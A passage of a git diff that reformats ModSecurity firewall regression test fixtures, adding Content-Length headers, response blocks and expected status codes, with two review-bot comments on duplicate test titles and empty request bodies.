@@ -1,63 +1,88 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action without desruptive action", - "expected":{ - "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action without desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/path1", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,status:404\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action with desruptive action", - "expected":{ - "http_code": 400 + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action with desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/path1", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,deny,status:400\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" diff --git a/test/test-cases/regression/action-ctl_audit_engine.json b/test/test-cases/regression/action-ctl_audit_engine.json index 3848ee7e55..c1f5ec86f4 100644 --- a/test/test-cases/regression/action-ctl_audit_engine.json +++ b/test/test-cases/regression/action-ctl_audit_engine.json 
@@ -15,24 +15,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?parm1=test1&parm2=test2", + "uri": "/test.pl?parm1=test1&parm2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "--A--", - "error_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/action-ctl_request_body_access.json b/test/test-cases/regression/action-ctl_request_body_access.json index a88a8a24b6..e09a732fdf 100644 --- a/test/test-cases/regression/action-ctl_request_body_access.json +++ b/test/test-cases/regression/action-ctl_request_body_access.json 
@@ -1,28 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -40,20 +40,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action" + "expected": { + "debug_log": "Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=Off\"", 
@@ -61,29 +63,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -101,20 +103,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim\"", 
@@ -122,29 +126,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -162,20 +166,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess Off", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=On\"", 
diff --git a/test/test-cases/regression/action-ctl_request_body_processor.json b/test/test-cases/regression/action-ctl_request_body_processor.json
index 52cfc2e651..e3b6554193 100644
--- a/test/test-cases/regression/action-ctl_request_body_processor.json
+++ b/test/test-cases/regression/action-ctl_request_body_processor.json
@@ -1,178 +1,202 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (1)", - "expected":{ - "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (1)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. 
Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (2)", - "expected":{ - "debug_log": "Rule returned 0" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (2)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + 
"Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (3)", - "expected":{ - "debug_log": "XML: Failed to parse document." 
+ { + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (3)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "9" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "not a xml" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to parse document.", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json index 2ad6093e84..4b1c22732e 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json 
+++ b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json 
@@ -1,97 +1,99 @@ [ { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "14", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/x-www-form-urlencoded", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "14", + "Content-Type": "application/x-www-form-urlencoded", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": 
"text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_engine.json b/test/test-cases/regression/action-ctl_rule_engine.json index 927b7077e8..db9885fa72 100644 --- a/test/test-cases/regression/action-ctl_rule_engine.json +++ b/test/test-cases/regression/action-ctl_rule_engine.json 
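Review bot: Both cases in this file keep the same title, `"ctl:requestBodyProcessor=URLENCODED"`, so a failure report cannot say which one broke. Only the first uses the ctl action; the second sends `application/x-www-form-urlencoded` with no `ctl:requestBodyProcessor` rule and reads as the baseline. Since the title lines are being rewritten anyway, I would number them like the neighbouring files do, e.g. `"title": "ctl:requestBodyProcessor=URLENCODED (1) - processor forced by ctl"` and `"title": "ctl:requestBodyProcessor=URLENCODED (2) - processor chosen by Content-Type"`.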
@@ -1,44 +1,47 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off\"", 
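Review bot: `"body": [ "" ]` replaces `"body":[ ]` while the same case now sets `"Content-Length": "0"`, and an array holding one empty string is not obviously the same thing as an empty array. The code that joins body elements is not part of this hunk; if it appends a line terminator per element, this case sends a one-byte body under a declared length of zero. Unless the harness needs an element to be present, `"body": []` states a bodiless request without that ambiguity. The same pairing appears in CtlRuleEngine (2) through (7) and in the ruleRemoveById and ruleRemoveByTag fixtures further down.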
@@ -46,45 +49,48 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly\"", 
@@ -92,222 +98,237 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On\"", "SecRule ARGS \"@contains test\" \"id:2,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (4)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (4)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
